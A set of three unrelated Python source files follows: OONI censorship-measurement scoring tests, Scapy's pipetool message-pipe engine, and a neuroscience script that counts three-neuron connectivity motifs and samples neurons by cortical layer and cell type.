"20191026T165434Z_AS0_qPbZHZF8VXUWgzlvqT9Jd7ARuHSl2Dq4tPcEq580rgYZGmV5Um": (
0.1,
0.0,
"generic_timeout_error",
),
"20191028T160112Z_AS1640_f4zyjjp5vFcwZkAKPrTokayPRdcXPfdEMRbdo1LmIaLZRile6P": (
0.1,
0.0,
"broken_pipe",
),
"20191029T094043Z_AS49048_qGQxBh6lv26TOfuWfhGcUtz2LZWwboXlfbh058CSF1fOmEUv6Z": (
0.1,
0.0,
"connection_refused",
),
}
for d in range(26, 30):
can = cans["dash_2019_10_{}".format(d)]
for msm_n, msm in load_can(can):
# input is not set or set to None
assert msm.get("input", None) is None
rid = msm["report_id"]
scores = fp.score_measurement(msm)
if rid in expected:
exp_bs, exp_acc, exp_fail = expected[rid]
assert scores["blocking_general"] == exp_bs
assert scores["accuracy"] == exp_acc
expected.pop(rid)
assert len(expected) == 0, expected.keys()
def test_score_meek_fronted_requests_test(cans):
debug = 0
for d in range(26, 30):
can = cans["meek_2019_10_{}".format(d)]
for msm_n, msm in load_can(can):
rid = msm["report_id"]
scores = fp.score_measurement(msm)
if rid == "20191026T110224Z_AS3352_2Iqv4PvPItJ2Z3D46wVRHzesBpdDJZ8xDKH7VKqNTebaiGopDY":
# response: None
assert scores["blocking_general"] == 1.0
elif rid == "20191026T000021Z_AS137_0KaXWBZgn8W6iMfKKhjHJPoPPovChlwxr8dDOh4LxTzHDOKLOq":
# One response: 404
assert scores["blocking_general"] == 1.0
elif rid == "20191026T000034Z_AS42668_vpZnPVKEym0dRgYSxyeZulPvnLtxrh6HXzyMx5tE2f4x26CBwX":
# 403 hitting cloudfront
# Content-Type: text/html
# Date: Sat, 26 Oct 2019 01:01:21 GMT
# Server: CloudFront
# Via: 1.1 60858c13889b9be849ae025edc06577d.cloudfront.net (CloudFront)
# X-Amz-Cf-Pop: ARN53
# X-Cache: Error from cloudfront
assert scores["blocking_general"] == 1.0
elif rid == "20191026T001625Z_AS19108_G9uGTtyJCiOzeCm4jHsP6r8WRZ8cWx07wvcjwAVmrTshJ8WYwA":
# requests: is empty
assert scores["accuracy"] == 0
elif debug:
print("https://explorer.ooni.org/measurement/{}".format(rid))
print_msm(msm)
print(scores)
assert 0
def test_score_psiphon(cans):
for can_fn, msm in s3msmts("psiphon", date(2020, 1, 9), date(2020, 1, 10)):
assert msm["test_name"] == "psiphon"
rid = msm["report_id"]
# test version 0.3.1 has different mkeys than before
mkeys = set(msm.keys())
mkeys.discard("resolver_ip") # Some msmts are missing this
assert len(mkeys) in (13, 15)
assert len(msm["test_keys"]) in (3, 6, 7)
assert 1 < msm["test_keys"]["bootstrap_time"] < 500
assert msm["test_keys"]["failure"] is None, msm
scores = fp.score_measurement(msm)
if rid == "20200109T111813Z_AS30722_RZeO9Ix6ET2LJzqGcinrDp1iqrhaGGDCHSwlOoybq2N9kZITQt":
assert scores == {
"accuracy": 1.0,
"blocking_general": 0.0,
"blocking_global": 0.0,
"blocking_country": 0.0,
"blocking_isp": 0.0,
"blocking_local": 0.0,
"extra": {"test_runtime": 15.25602748, "bootstrap_time": 5.532639553},
}
break
@pytest.mark.skip("slow")
def test_score_psiphon_2():
for can_fn, msm in minicans("psiphon", date(2021, 11, 1), date(2021, 11, 2), 1):
rid = msm["report_id"]
scores = fp.score_measurement(msm)
if rid == "20211101T002503Z_psiphon_AT_40980_n1_pJPrpMWu3rfDXEcV":
assert scores == {
"accuracy": 1.0,
"blocking_general": 0.0,
"blocking_global": 0.0,
"blocking_country": 0.0,
"blocking_isp": 0.0,
"blocking_local": 0.0,
"extra": {"test_runtime": 6.774142658},
}, msm
return
assert 0, "Measurement not found"
def test_score_http_invalid_request_line_1():
# https://github.com/ooni/pipeline/issues/294
# https://explorer.ooni.org/measurement/20190411T192031Z_AS12353_JcA0e4AwUYYzR8aSXkoOiPGSiSmG8naeMOYnOPisECTr5bqelw
# AdGuard
fn = "fastpath/tests/data/mbx-1.json"
with open(fn) as f:
msm = ujson.load(f)
matches = []
scores = fp.score_measurement(msm)
assert scores == {
"blocking_general": 1.0,
"blocking_global": 0.0,
"blocking_country": 0.0,
"blocking_isp": 0.0,
"blocking_local": 0.0,
}
def test_score_http_invalid_request_line_2():
# https://github.com/ooni/pipeline/issues/293
# https://explorer.ooni.org/measurement/20181223T053541Z_AS37211_Vjr633mrbpd5UwOkZXid7U8QnwdDILnDu63UTFd1gE7zR4gnhN
fn = "fastpath/tests/data/mbx-2.json"
with open(fn) as f:
msm = ujson.load(f)
matches = []
scores = fp.score_measurement(msm)
assert scores == {
"blocking_general": 1.0,
"blocking_global": 0.0,
"blocking_country": 0.0,
"blocking_isp": 0.0,
"blocking_local": 0.0,
}
def test_score_http_invalid_request_line():
optional = frozenset(
(
"backend_version",
"bucket_date",
"id",
"input",
"input_hashes",
"options",
"probe_city",
"report_filename",
"resolver_asn",
"resolver_ip",
"resolver_network_name",
"test_helpers",
)
)
always_present = frozenset(
(
"annotations",
"data_format_version",
"measurement_start_time",
"probe_asn",
"probe_cc",
"probe_ip",
"report_id",
"software_name",
"software_version",
"test_keys",
"test_name",
"test_runtime",
"test_start_time",
"test_version",
)
)
allkeys = optional | always_present
for can_fn, msm in s3msmts("http_invalid_request_line", date(2019, 12, 3), date(2019, 12, 5)):
assert msm["test_name"] == "http_invalid_request_line"
for k in msm:
assert k in allkeys
for k in always_present:
assert k in msm
scores = fp.score_measurement(msm)
rid = msm["report_id"]
if rid == "20191203T020321Z_AS21502_wcb1ieBo7mO2vffn2FOlQW2oPw4QiaOoLiYGWoecyV5aQQaMGm":
# failure
assert scores["accuracy"] == 0.0
def test_score_signal():
for can_fn, msm in minicans("signal", date(2021, 4, 27), date(2021, 4, 27), 100):
assert msm["test_name"] == "signal"
scores = fp.score_measurement(msm)
assert scores
rid = msm["report_id"]
if rid == "20210427T023145Z_signal_CN_24400_n1_ynto2TVYXtqxhtOo":
assert scores == {
"analysis": {"signal_backend_failure": "generic_timeout_error"},
"blocking_general": 1.0,
"blocking_global": 0.0,
"blocking_country": 0.0,
"blocking_isp": 0.0,
"blocking_local": 0.0,
}
elif rid == "20210427T000430Z_signal_AU_45671_n1_Zq1z77FuiG2IkqqC":
assert scores == {
"blocking_general": 0.0,
"blocking_global": 0.0,
"blocking_country": 0.0,
"blocking_isp": 0.0,
"blocking_local": 0.0,
}
# No failure was found
# elif "accuracy" in scores:
def test_score_stunreachability():
for can_fn, msm in minicans("stunreachability", date(2022, 1, 25), date(2022, 1, 26), 1):
scores = fp.score_measurement(msm)
assert msm["report_id"] == "20220125T000735Z_stunreachability_AT_12605_n1_DaOzvtj2vaXE8GH2"
assert scores == {
"blocking_general": 0.0,
"blocking_global": 0.0,
"blocking_country": 0.0,
"blocking_isp": 0.0,
"blocking_local": 0.0,
"extra": {"endpoint": "stun.l.google.com:19302"},
}
return
assert 0, "Measurement not found"
def test_score_torsf():
for can_fn, msm in minicans("torsf", date(2021, 11, 23), date(2021, 11, 23), 1):
scores = fp.score_measurement(msm)
assert scores == {
"blocking_general": 0.0,
"blocking_global": 0.0,
"blocking_country": 0.0,
"blocking_isp": 0.0,
"blocking_local": 0.0,
"extra": {"bootstrap_time": 142.883336871, "test_runtime": 143.090651217},
}
assert msm["report_id"] == "20211123T142631Z_torsf_IT_30722_n1_vrWHDorLfK5ROZzS"
return
assert 0, "Measurement not found"
def test_score_riseupvpn():
for can_fn, msm in minicans("riseupvpn", date(2021, 10, 15), date(2021, 10, 16), 1):
scores = fp.score_measurement(msm)
assert scores == {
"blocking_general": 0.0,
"blocking_global": 0.0,
"blocking_country": 0.0,
"blocking_isp": 0.0,
"blocking_local": 0.0,
"extra": {"test_runtime": 3.8260852},
}
assert msm["report_id"] == "20211015T005140Z_riseupvpn_AR_7303_n1_gc8so3BXiS9thxBJ"
return
assert 0, "Measurement not found"
def test_flag_measurements_with_wrong_date_from_future():
# measurement_start_time > msmt_uid timestamp
msm = {"measurement_start_time": "2021-11-09 23:59:31"}
msmt_uid = "20211109115946.469008_IR_webconnectivity_9ba8a0d4f9b116fe"
scores = {}
fp.flag_measurements_with_wrong_date(msm, msmt_uid, scores)
assert scores["msg"] == "Measurement start time from the future"
def test_flag_measurements_with_wrong_date_too_old():
msm = {"measurement_start_time": "2020-01-01 00:00:01"}
msmt_uid = "20211109115946.469008_IR_webconnectivity_9ba8a0d4f9b116fe"
scores = {}
fp.flag_measurements_with_wrong_date(msm, msmt_uid, scores)
assert scores["msg"] == "Measurement start time too old"
|
pipetool.py | #! /usr/bin/env python
## This file is part of Scapy
## See http://www.secdev.org/projects/scapy for more informations
## Copyright (C) Philippe Biondi <phil@secdev.org>
## This program is published under a GPLv2 license
from __future__ import print_function
import os
import subprocess
import itertools
import collections
import time
import scapy.modules.six as six
from threading import Lock, Thread
import scapy.utils
from scapy.automaton import Message, select_objects, SelectableObject
from scapy.consts import WINDOWS
from scapy.error import log_interactive, warning
from scapy.config import conf
from scapy.utils import get_temp_file, do_graph
import scapy.arch
class PipeEngine(SelectableObject):
pipes = {}
@classmethod
def list_pipes(cls):
for pn,pc in sorted(cls.pipes.items()):
doc = pc.__doc__ or ""
if doc:
doc = doc.splitlines()[0]
print("%20s: %s" % (pn, doc))
@classmethod
def list_pipes_detailed(cls):
for pn,pc in sorted(cls.pipes.items()):
if pc.__doc__:
print("###### %s\n %s" % (pn ,pc.__doc__))
else:
print("###### %s" % pn)
def __init__(self, *pipes):
self.active_pipes = set()
self.active_sources = set()
self.active_drains = set()
self.active_sinks = set()
self._add_pipes(*pipes)
self.thread_lock = Lock()
self.command_lock = Lock()
self.__fd_queue = collections.deque()
self.__fdr,self.__fdw = os.pipe()
self.thread = None
def __getattr__(self, attr):
if attr.startswith("spawn_"):
dname = attr[6:]
if dname in self.pipes:
def f(*args, **kargs):
k = self.pipes[dname]
p = k(*args, **kargs)
self.add(p)
return p
return f
raise AttributeError(attr)
def check_recv(self):
"""As select.select is not available, we check if there
is some data to read by using a list that stores pointers."""
return len(self.__fd_queue) > 0
def fileno(self):
return self.__fdr
def _read_cmd(self):
os.read(self.__fdr,1)
return self.__fd_queue.popleft()
def _write_cmd(self, _cmd):
self.__fd_queue.append(_cmd)
os.write(self.__fdw, b"X")
self.call_release()
def add_one_pipe(self, pipe):
self.active_pipes.add(pipe)
if isinstance(pipe, Source):
self.active_sources.add(pipe)
if isinstance(pipe, Drain):
self.active_drains.add(pipe)
if isinstance(pipe, Sink):
self.active_sinks.add(pipe)
def get_pipe_list(self, pipe):
def flatten(p, l):
l.add(p)
for q in p.sources|p.sinks|p.high_sources|p.high_sinks:
if q not in l:
flatten(q, l)
pl = set()
flatten(pipe, pl)
return pl
def _add_pipes(self, *pipes):
pl = set()
for p in pipes:
pl |= self.get_pipe_list(p)
pl -= self.active_pipes
for q in pl:
self.add_one_pipe(q)
return pl
def run(self):
log_interactive.info("Pipe engine thread started.")
try:
for p in self.active_pipes:
p.start()
sources = self.active_sources
sources.add(self)
exhausted = set([])
RUN=True
STOP_IF_EXHAUSTED = False
while RUN and (not STOP_IF_EXHAUSTED or len(sources) > 1):
fds = select_objects(sources, 2)
for fd in fds:
if fd is self:
cmd = self._read_cmd()
if cmd == "X":
RUN=False
break
elif cmd == "B":
STOP_IF_EXHAUSTED = True
elif cmd == "A":
sources = self.active_sources-exhausted
sources.add(self)
else:
warning("Unknown internal pipe engine command: %r. Ignoring." % cmd)
elif fd in sources:
try:
fd.deliver()
except Exception as e:
log_interactive.exception("piping from %s failed: %s" % (fd.name, e))
else:
if fd.exhausted():
exhausted.add(fd)
sources.remove(fd)
except KeyboardInterrupt:
pass
finally:
try:
for p in self.active_pipes:
p.stop()
finally:
self.thread_lock.release()
log_interactive.info("Pipe engine thread stopped.")
def start(self):
if self.thread_lock.acquire(0):
_t = Thread(target=self.run)
_t.setDaemon(True)
_t.start()
self.thread = _t
else:
warning("Pipe engine already running")
def wait_and_stop(self):
self.stop(_cmd="B")
def stop(self, _cmd="X"):
try:
with self.command_lock:
if self.thread is not None:
self._write_cmd(_cmd)
self.thread.join()
try:
self.thread_lock.release()
except:
pass
else:
warning("Pipe engine thread not running")
except KeyboardInterrupt:
print("Interrupted by user.")
def add(self, *pipes):
pipes = self._add_pipes(*pipes)
with self.command_lock:
if self.thread is not None:
for p in pipes:
p.start()
self._write_cmd("A")
def graph(self,**kargs):
g=['digraph "pipe" {',"\tnode [shape=rectangle];",]
for p in self.active_pipes:
g.append('\t"%i" [label="%s"];' % (id(p), p.name))
g.append("")
g.append("\tedge [color=blue, arrowhead=vee];")
for p in self.active_pipes:
for q in p.sinks:
g.append('\t"%i" -> "%i";' % (id(p), id(q)))
g.append("")
g.append("\tedge [color=purple, arrowhead=veevee];")
for p in self.active_pipes:
for q in p.high_sinks:
g.append('\t"%i" -> "%i";' % (id(p), id(q)))
g.append("")
g.append("\tedge [color=red, arrowhead=diamond];")
for p in self.active_pipes:
for q in p.trigger_sinks:
g.append('\t"%i" -> "%i";' % (id(p), id(q)))
g.append('}')
graph = "\n".join(g)
do_graph(graph, **kargs)
class _ConnectorLogic(object):
def __init__(self):
self.sources = set()
self.sinks = set()
self.high_sources = set()
self.high_sinks = set()
self.trigger_sources = set()
self.trigger_sinks = set()
def __lt__(self, other):
other.sinks.add(self)
self.sources.add(other)
return other
def __gt__(self, other):
self.sinks.add(other)
other.sources.add(self)
return other
def __eq__(self, other):
self > other
other > self
return other
def __lshift__(self, other):
self.high_sources.add(other)
other.high_sinks.add(self)
return other
def __rshift__(self, other):
self.high_sinks.add(other)
other.high_sources.add(self)
return other
def __floordiv__(self, other):
self >> other
other >> self
return other
def __xor__(self, other):
self.trigger_sinks.add(other)
other.trigger_sources.add(self)
return other
def __hash__(self):
return object.__hash__(self)
class _PipeMeta(type):
def __new__(cls, name, bases, dct):
c = type.__new__(cls, name, bases, dct)
PipeEngine.pipes[name] = c
return c
class Pipe(six.with_metaclass(_PipeMeta, _ConnectorLogic)):
def __init__(self, name=None):
_ConnectorLogic.__init__(self)
if name is None:
name = "%s" % (self.__class__.__name__)
self.name = name
def _send(self, msg):
for s in self.sinks:
s.push(msg)
def _high_send(self, msg):
for s in self.high_sinks:
s.high_push(msg)
def _trigger(self, msg=None):
for s in self.trigger_sinks:
s.on_trigger(msg)
def __repr__(self):
ct = conf.color_theme
s = "%s%s" % (ct.punct("<"), ct.layer_name(self.name))
if self.sources or self.sinks:
s+= " %s" % ct.punct("[")
if self.sources:
s+="%s%s" % (ct.punct(",").join(ct.field_name(s.name) for s in self.sources),
ct.field_value(">"))
s += ct.layer_name("#")
if self.sinks:
s+="%s%s" % (ct.field_value(">"),
ct.punct(",").join(ct.field_name(s.name) for s in self.sinks))
s += ct.punct("]")
if self.high_sources or self.high_sinks:
s+= " %s" % ct.punct("[")
if self.high_sources:
s+="%s%s" % (ct.punct(",").join(ct.field_name(s.name) for s in self.high_sources),
ct.field_value(">>"))
s += ct.layer_name("#")
if self.high_sinks:
s+="%s%s" % (ct.field_value(">>"),
ct.punct(",").join(ct.field_name(s.name) for s in self.high_sinks))
s += ct.punct("]")
if self.trigger_sources or self.trigger_sinks:
s+= " %s" % ct.punct("[")
if self.trigger_sources:
s+="%s%s" % (ct.punct(",").join(ct.field_name(s.name) for s in self.trigger_sources),
ct.field_value("^"))
s += ct.layer_name("#")
if self.trigger_sinks:
s+="%s%s" % (ct.field_value("^"),
ct.punct(",").join(ct.field_name(s.name) for s in self.trigger_sinks))
s += ct.punct("]")
s += ct.punct(">")
return s
class Source(Pipe, SelectableObject):
def __init__(self, name=None):
Pipe.__init__(self, name=name)
self.is_exhausted = False
def _read_message(self):
return Message()
def deliver(self):
msg = self._read_message
self._send(msg)
def fileno(self):
return None
def check_recv(self):
return False
def exhausted(self):
return self.is_exhausted
def start(self):
pass
def stop(self):
pass
class Drain(Pipe):
"""Repeat messages from low/high entries to (resp.) low/high exits
+-------+
>>-|-------|->>
| |
>-|-------|->
+-------+
"""
def push(self, msg):
self._send(msg)
def high_push(self, msg):
self._high_send(msg)
def start(self):
pass
def stop(self):
pass
class Sink(Pipe):
def push(self, msg):
pass
def high_push(self, msg):
pass
def start(self):
pass
def stop(self):
pass
class AutoSource(Source, SelectableObject):
def __init__(self, name=None):
Source.__init__(self, name=name)
self.__fdr,self.__fdw = os.pipe()
self._queue = collections.deque()
def fileno(self):
return self.__fdr
def check_recv(self):
return len(self._queue) > 0
def _gen_data(self, msg):
self._queue.append((msg,False))
self._wake_up()
def _gen_high_data(self, msg):
self._queue.append((msg,True))
self._wake_up()
def _wake_up(self):
os.write(self.__fdw, b"X")
self.call_release()
def deliver(self):
os.read(self.__fdr,1)
try:
msg,high = self._queue.popleft()
except IndexError: #empty queue. Exhausted source
pass
else:
if high:
self._high_send(msg)
else:
self._send(msg)
class ThreadGenSource(AutoSource):
def __init__(self, name=None):
AutoSource.__init__(self, name=name)
self.RUN = False
def generate(self):
pass
def start(self):
self.RUN = True
Thread(target=self.generate).start()
def stop(self):
self.RUN = False
class ConsoleSink(Sink):
"""Print messages on low and high entries
+-------+
>>-|--. |->>
| print |
>-|--' |->
+-------+
"""
def push(self, msg):
print(">%r" % msg)
def high_push(self, msg):
print(">>%r" % msg)
class RawConsoleSink(Sink):
"""Print messages on low and high entries
+-------+
>>-|--. |->>
| write |
>-|--' |->
+-------+
"""
def __init__(self, name=None, newlines=True):
Sink.__init__(self, name=name)
self.newlines = newlines
self._write_pipe = 1
def push(self, msg):
if self.newlines:
msg += "\n"
os.write(self._write_pipe, msg.encode("utf8"))
def high_push(self, msg):
if self.newlines:
msg += "\n"
os.write(self._write_pipe, msg.encode("utf8"))
class CLIFeeder(AutoSource):
"""Send messages from python command line
+--------+
>>-| |->>
| send() |
>-| `----|->
+--------+
"""
def send(self, msg):
self._gen_data(msg)
def close(self):
self.is_exhausted = True
class CLIHighFeeder(CLIFeeder):
"""Send messages from python command line to high output
+--------+
>>-| .----|->>
| send() |
>-| |->
+--------+
"""
def send(self, msg):
self._gen_high_data(msg)
class PeriodicSource(ThreadGenSource):
"""Generage messages periodically on low exit
+-------+
>>-| |->>
| msg,T |
>-| `----|->
+-------+
"""
def __init__(self, msg, period, period2=0, name=None):
ThreadGenSource.__init__(self,name=name)
if not isinstance(msg, (list, set, tuple)):
msg=[msg]
self.msg = msg
self.period = period
self.period2 = period2
def generate(self):
while self.RUN:
empty_gen = True
for m in self.msg:
empty_gen = False
self._gen_data(m)
time.sleep(self.period)
if empty_gen:
self.is_exhausted = True
self._wake_up()
time.sleep(self.period2)
class TermSink(Sink):
"""Print messages on low and high entries on a separate terminal
+-------+
>>-|--. |->>
| print |
>-|--' |->
+-------+
"""
def __init__(self, name=None, keepterm=True, newlines=True, openearly=True):
Sink.__init__(self, name=name)
self.keepterm = keepterm
self.newlines = newlines
self.openearly = openearly
self.opened = False
if self.openearly:
self.start()
def _start_windows(self):
if not self.opened:
self.opened = True
self.__f = get_temp_file()
open(self.__f, "a").close()
self.name = "Scapy" if self.name is None else self.name
# Start a powershell in a new window and print the PID
cmd = "$app = Start-Process PowerShell -ArgumentList '-command &{$host.ui.RawUI.WindowTitle=\\\"%s\\\";Get-Content \\\"%s\\\" -wait}' -passthru; echo $app.Id" % (self.name, self.__f.replace("\\", "\\\\"))
proc = subprocess.Popen([conf.prog.powershell, cmd], stdout=subprocess.PIPE)
output, _ = proc.communicate()
# This is the process PID
self.pid = int(output)
print("PID: %d" % self.pid)
def _start_unix(self):
if not self.opened:
self.opened = True
rdesc, self.wdesc = os.pipe()
cmd = ["xterm"]
if self.name is not None:
cmd.extend(["-title",self.name])
if self.keepterm:
cmd.append("-hold")
cmd.extend(["-e", "cat <&%d" % rdesc])
self.proc = subprocess.Popen(cmd, close_fds=False)
os.close(rdesc)
def start(self):
if WINDOWS:
return self._start_windows()
else:
return self._start_unix()
def _stop_windows(self):
if not self.keepterm:
self.opened = False
# Recipe to kill process with PID
# http://code.activestate.com/recipes/347462-terminating-a-subprocess-on-windows/
import ctypes
PROCESS_TERMINATE = 1
handle = ctypes.windll.kernel32.OpenProcess(PROCESS_TERMINATE, False, self.pid)
ctypes.windll.kernel32.TerminateProcess(handle, -1)
ctypes.windll.kernel32.CloseHandle(handle)
def _stop_unix(self):
if not self.keepterm:
self.opened = False
self.proc.kill()
self.proc.wait()
def stop(self):
if WINDOWS:
return self._stop_windows()
else:
return self._stop_unix()
def _print(self, s):
if self.newlines:
s+="\n"
if WINDOWS:
wdesc = open(self.__f, "a")
wdesc.write(s)
wdesc.close()
else:
os.write(self.wdesc, s.encode())
def push(self, msg):
self._print(str(msg))
def high_push(self, msg):
self._print(str(msg))
class QueueSink(Sink):
"""Collect messages from high and low entries and queue them. Messages are unqueued with the .recv() method.
+-------+
>>-|--. |->>
| queue |
>-|--' |->
+-------+
"""
def __init__(self, name=None):
Sink.__init__(self, name=name)
self.q = six.moves.queue.Queue()
def push(self, msg):
self.q.put(msg)
def high_push(self, msg):
self.q.put(msg)
def recv(self):
while True:
try:
return self.q.get(True, timeout=0.1)
except six.moves.queue.Empty:
pass
class TransformDrain(Drain):
"""Apply a function to messages on low and high entry
+-------+
>>-|--[f]--|->>
| |
>-|--[f]--|->
+-------+
"""
def __init__(self, f, name=None):
Drain.__init__(self, name=name)
self.f = f
def push(self, msg):
self._send(self.f(msg))
def high_push(self, msg):
self._high_send(self.f(msg))
class UpDrain(Drain):
"""Repeat messages from low entry to high exit
+-------+
>>-| ,--|->>
| / |
>-|--' |->
+-------+
"""
def push(self, msg):
self._high_send(msg)
def high_push(self, msg):
pass
class DownDrain(Drain):
"""Repeat messages from high entry to low exit
+-------+
>>-|--. |->>
| \ |
>-| `--|->
+-------+
"""
def push(self, msg):
pass
def high_push(self, msg):
self._send(msg)
|
eval_motifs.py | import os
import sys
import multiprocessing as mp
import numpy as np
import json
import traceback
import warnings
import util
import util_meta
import util_filter
import motif_combinations
import constants
import util_intersomatic_distance
def getMotifIndex_16():
return {
(0,0,0,0,0,0) : 16, # no edges
(1,0,0,0,0,0) : 15, # A -> B
(0,1,0,0,0,0) : 15, # B -> A
(0,0,1,0,0,0) : 15, # A -> C
(0,0,0,1,0,0) : 15, # C -> A
(0,0,0,0,1,0) : 15, # B -> C
(0,0,0,0,0,1) : 15, # C -> B
(1,1,0,0,0,0) : 14, # A <-> B
(0,0,1,1,0,0) : 14, # A <-> C
(0,0,0,0,1,1) : 14, # B <-> C
(1,0,0,0,1,0) : 13, # A -> B -> C
(0,0,1,0,0,1) : 13, # A -> C -> B
(0,1,1,0,0,0) : 13, # B -> A -> C
(0,0,0,1,1,0) : 13, # B -> C -> A
(1,0,0,1,0,0) : 13, # C -> A -> B
(0,1,0,0,0,1) : 13, # C -> B -> A
(1,0,1,0,0,0) : 12, # A -> B, C
(0,1,0,0,1,0) : 12, # B -> A, C
(0,0,0,1,0,1) : 12, # C -> A, B
(0,0,1,0,1,0) : 11, # A, B -> C
(1,0,0,0,0,1) : 11, # A, C -> B
(0,1,0,1,0,0) : 11, # B, C -> A
(1,1,0,1,0,0) : 10, # A <-> B; C -> A
(1,1,0,0,0,1) : 10, # A <-> B; C -> B
(0,1,1,1,0,0) : 10, # A <-> C; B -> A
(0,0,1,1,1,0) : 10, # A <-> C; B -> C
(1,0,0,0,1,1) : 10, # B <-> C; A -> B
(0,0,1,0,1,1) : 10, # B <-> C; A -> C
(1,1,1,0,0,0) : 9, # A <-> B; A -> C
(1,1,0,0,1,0) : 9, # A <-> B; B -> C
(1,0,1,1,0,0) : 9, # A <-> C; A -> B
(0,0,1,1,0,1) : 9, # A <-> C; C -> B
(0,1,0,0,1,1) : 9, # B <-> C; B -> A
(0,0,0,1,1,1) : 9, # B <-> C; C -> A
(1,1,1,1,0,0) : 8, # A <-> B; A <-> C
(1,1,0,0,1,1) : 8, # A <-> B; B <-> C
(0,0,1,1,1,1) : 8, # A <-> C; B <-> C
(1,0,0,1,1,0) : 7, # A -> B -> C -> A
(0,1,1,0,0,1) : 7, # A -> C -> B -> A
(1,0,1,0,1,0) : 6, # A -> B,C; B -> C
(1,0,1,0,0,1) : 6, # A -> B,C; C -> B
(0,1,1,0,1,0) : 6, # B -> A,C; A -> C
(0,1,0,1,1,0) : 6, # B -> A,C; C -> A
(1,0,0,1,0,1) : 6, # C -> A,B; A -> B
(0,1,0,1,0,1) : 6, # C -> A,B; B -> A
(1,1,1,0,0,1) : 5, # A <-> B; A -> C -> B
(1,1,0,1,1,0) : 5, # A <-> B; B -> C -> A
(1,0,1,1,1,0) : 5, # A <-> C; A -> B -> C
(0,1,1,1,0,1) : 5, # A <-> C; C -> B -> A
(0,1,1,0,1,1) : 5, # B <-> C; B -> A -> C
(1,0,0,1,1,1) : 5, # B <-> C; C -> A -> B
(1,1,0,1,0,1) : 4, # A <-> B; C -> A, B
(0,1,1,1,1,0) : 4, # A <-> C; B -> A, C
(1,0,1,0,1,1) : 4, # B <-> C; A -> B, C
(1,1,1,0,1,0) : 3, # A <-> B; A -> C; B -> C
(1,0,1,1,0,1) : 3, # A <-> C; A -> B; C -> B
(0,1,0,1,1,1) : 3, # B <-> C; B -> A; C -> A
(1,1,1,1,1,0) : 2, # A <-> B; A <-> C; B -> C
(1,1,1,1,0,1) : 2, # A <-> B; A <-> C; C -> B
(1,1,1,0,1,1) : 2, # A <-> B; B <-> C; A -> C
(1,1,0,1,1,1) : 2, # A <-> B; B <-> C; C -> A
(1,0,1,1,1,1) : 2, # A <-> C; B <-> C; A -> B
(0,1,1,1,1,1) : 2, # A <-> C; B <-> C; B -> A
(1,1,1,1,1,1) : 1 # A <-> B; A <-> C; B <-> C
}
def assertSumsToOne(probabilities, tolerance = 0.01):
summed = np.sum(list(probabilities.values()))
if(abs(summed - 1) > tolerance):
raise RuntimeError("summed probabilities: {:.12f}".format(summed))
def aggregateProbabilties_16(probabilities_64):
probabilities_16 = {}
for k in range(1, 17):
probabilities_16[k] = 0
motifIndex16 = getMotifIndex_16()
for maskKey, probability in probabilities_64.items():
motifNumber = motifIndex16[maskKey]
probabilities_16[motifNumber] += probability
assertSumsToOne(probabilities_16)
return probabilities_16
def removePopulationPrefix(combination):
if("#" in combination):
return combination.split("#")[0]
else:
return combination
def getPopulationsFromCombinations(combinations, mode):
nonredundantPopulations = set()
for combination in combinations:
nonredundantPopulations.add(removePopulationPrefix(combination[0]))
nonredundantPopulations.add(removePopulationPrefix(combination[1]))
nonredundantPopulations.add(removePopulationPrefix(combination[2]))
populations = [] # [(column, celltype/layer)]
for population in nonredundantPopulations:
parts = population.split("-")
column = parts[0]
celltypeLayer = parts[1]
populations.append((column, celltypeLayer))
return populations
def sampleIdsForPopulation(neurons, neuronsLayer, population, sampleSize):
column = population[0]
celltypeLayer = population[1]
filterSpec = util_filter.getDefaultFilter()
if(column in constants.getColumns()):
regions = constants.getRegionsForColumn(column, includeSurrounding=False)
filterSpec["region_whitelist"] = regions
elif(column == "ALL"):
pass
else:
raise ValueError(column)
if celltypeLayer in constants.getCellTypes():
celltype = celltypeLayer
if(celltype == "VPM"):
filterSpec["inside_vS1"] = []
filterSpec["celltype_whitelist"] = [celltype]
elif(celltypeLayer == "ALL"):
pass
elif(celltypeLayer == "EXC"):
filterSpec["celltype_blacklist"] = ["INH"]
elif(celltypeLayer == "INH"):
filterSpec["celltype_whitelist"] = ["INH"]
elif(celltypeLayer == "L1"):
filterSpec["layer_whitelist"] = ["L1"]
elif(celltypeLayer == "L2"):
filterSpec["layer_whitelist"] = ["L2"]
elif(celltypeLayer == "L3"):
filterSpec["layer_whitelist"] = ["L3"]
elif(celltypeLayer == "L4"):
filterSpec["layer_whitelist"] = ["L4"]
elif(celltypeLayer == "L5"):
filterSpec["layer_whitelist"] = ["L5"]
elif(celltypeLayer == "L6"):
filterSpec["layer_whitelist"] = ["L6"]
elif(celltypeLayer == "L1EXC"):
filterSpec["layer_whitelist"] = ["L1"]
filterSpec["celltype_blacklist"] = ["INH"]
elif(celltypeLayer == "L1INH"):
filterSpec["layer_whitelist"] = ["L2"]
filterSpec["celltype_whitelist"] = ["INH"]
elif(celltypeLayer == "L2EXC"):
filterSpec["layer_whitelist"] = ["L2"]
filterSpec["celltype_blacklist"] = ["INH"]
elif(celltypeLayer == "L2INH"):
filterSpec["layer_whitelist"] = ["L2"]
filterSpec["celltype_whitelist"] = ["INH"]
elif(celltypeLayer == "L3EXC"):
filterSpec["layer_whitelist"] = ["L3"]
filterSpec["celltype_blacklist"] = ["INH"]
elif(celltypeLayer == "L3INH"):
filterSpec["layer_whitelist"] = ["L3"]
filterSpec["celltype_whitelist"] = ["INH"]
elif(celltypeLayer == "L4EXC"):
filterSpec["layer_whitelist"] = ["L4"]
filterSpec["celltype_blacklist"] = ["INH"]
elif(celltypeLayer == "L4INH"):
filterSpec["layer_whitelist"] = ["L4"]
filterSpec["celltype_whitelist"] = ["INH"]
elif(celltypeLayer == "L5EXC"):
filterSpec["layer_whitelist"] = ["L5"]
filterSpec["celltype_blacklist"] = ["INH"]
elif(celltypeLayer == "L5INH"):
filterSpec["layer_whitelist"] = ["L5"]
filterSpec["celltype_whitelist"] = ["INH"]
elif(celltypeLayer == "L6EXC"):
filterSpec["layer_whitelist"] = ["L6"]
filterSpec["celltype_blacklist"] = ["INH"]
elif(celltypeLayer == "L6INH"):
filterSpec["layer_whitelist"] = ["L6"]
filterSpec["celltype_whitelist"] = ["INH"]
else:
raise ValueError(celltypeLayer)
nids = list(util_filter.filterNIDs(neurons, filterSpec, neuronsLayer=neuronsLayer))
nidsSampled = list(util.getRandomSubset(nids, sampleSize))
if(not len(nidsSampled)):
raise RuntimeError("empty sample: {}".format(population))
nids.sort()
nidsSampled.sort()
return nids, nidsSampled
